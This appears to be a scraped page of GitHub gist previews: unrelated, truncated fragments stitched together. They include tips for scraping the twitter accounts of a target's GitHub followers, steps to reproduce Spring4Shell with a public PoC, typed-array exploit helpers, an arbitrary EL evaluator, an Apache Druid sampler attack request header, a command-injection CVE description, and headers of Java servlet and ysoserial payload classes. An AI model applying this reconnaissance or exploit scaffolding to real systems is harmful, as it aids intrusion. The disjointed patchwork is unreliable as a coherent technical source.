nil0x42's tips & tricks
- Scrape twitter account of all github followers of target user on GitHub
- Scrape twitter account of all stargazers of target project on GitHub
At this point, it is probably easier to just use something like this: https://github.com/reznok/Spring4Shell-POC | |
- clone https://spring.io/guides/gs/handling-form-submission/ | |
- you can skip right to gs-handling-form-submission/complete, no need to follow the tutorial | |
- modify it so that you can build a war file (https://www.baeldung.com/spring-boot-war-tomcat-deploy) | |
- install tomcat9 + java 11 (I did it on Ubuntu 20.04) | |
- deploy the war file | |
- update the PoC (https://share.vx-underground.org/) to write the tomcatwar.jsp file to webapps/handling-form-submission instead of webapps/ROOT |
class Helpers { | |
/**
 * Wires up a single 8-byte ArrayBuffer with four overlapping typed-array
 * views (f64, f32, u32, u64) so a value written through one view can be
 * read back as raw bits through another, plus an empty `state` object
 * (how `state` is used lies outside this fragment).
 */
constructor() {
    const backing = new ArrayBuffer(8);
    this.buf = backing;
    this.f64 = new Float64Array(backing);
    this.f32 = new Float32Array(backing);
    this.u32 = new Uint32Array(backing);
    this.u64 = new BigUint64Array(backing);
    this.state = {};
}
/**
 * Evaluates {@code expression} as a JUEL value expression against a fresh,
 * empty {@code SimpleContext} and returns the resulting value.
 *
 * <p>The text is compiled and evaluated by the expression language itself,
 * which can invoke methods on whatever the expression names; treat
 * {@code expression} as trusted code, not as something to accept from
 * request parameters or other external input.
 *
 * @param expression EL expression text, e.g. {@code "${1 + 1}"}
 * @return the value the expression evaluates to, as an {@code Object}
 * @throws javax.el.ELException if the expression cannot be parsed or evaluated
 */
public static Object evaluate(String expression) {
    ELContext context = new de.odysseus.el.util.SimpleContext();
    ExpressionFactory factory = new de.odysseus.el.ExpressionFactoryImpl();
    ValueExpression compiled =
            factory.createValueExpression(context, expression, Object.class);
    return compiled.getValue(context);
}
POST /druid/indexer/v1/sampler HTTP/1.1 | |
Host: x.x.x.x:8888 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 | |
Accept: application/json, text/plain, */* | |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | |
Content-Type: application/json | |
Content-Length: 1045 | |
Connection: close | |
Suggested description | |
The WebControl in | |
RaspberryTortoise through 2012-10-28 is vulnerable to remote code execution via shell metacharacters in a URI. | |
The file nodejs/raspberryTortoise.js has no validation on the | |
parameter incomingString before passing it to the child_process.exec | |
function. | |
------------------------------------------ | |
[Additional Information] |
//Author:fnmsd | |
//Blog:https://blog.csdn.net/fnmsd | |
import javax.servlet.http.HttpServletRequest; | |
import javax.servlet.http.HttpServletResponse; | |
import java.lang.reflect.Field; | |
import java.util.HashSet; | |
import java.util.Scanner; | |
public class a { |
//Author:fnmsd | |
//Blog:https://blog.csdn.net/fnmsd | |
package aa; | |
import javax.servlet.http.HttpServletRequest; | |
import javax.servlet.http.HttpServletResponse; | |
import java.io.PrintWriter; | |
import java.lang.reflect.Field; | |
import java.lang.reflect.Modifier; | |
import java.util.HashSet; |
package ysoserial.payloads; | |
import com.mchange.lang.ByteUtils; | |
import org.apache.commons.collections.Transformer; | |
import org.apache.commons.collections.functors.ChainedTransformer; | |
import org.apache.commons.collections.functors.ConstantTransformer; | |
import org.apache.commons.collections.functors.InvokerTransformer; | |
import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
import org.apache.commons.collections.map.LazyMap; | |
import ysoserial.payloads.annotation.Authors; |
#!/usr/bin/env python3 | |
import sys | |
import requests | |
import urllib3 | |
import json | |
import re | |
from types import SimpleNamespace as Namespace | |
from feedgen.feed import FeedGenerator | |
output = '' |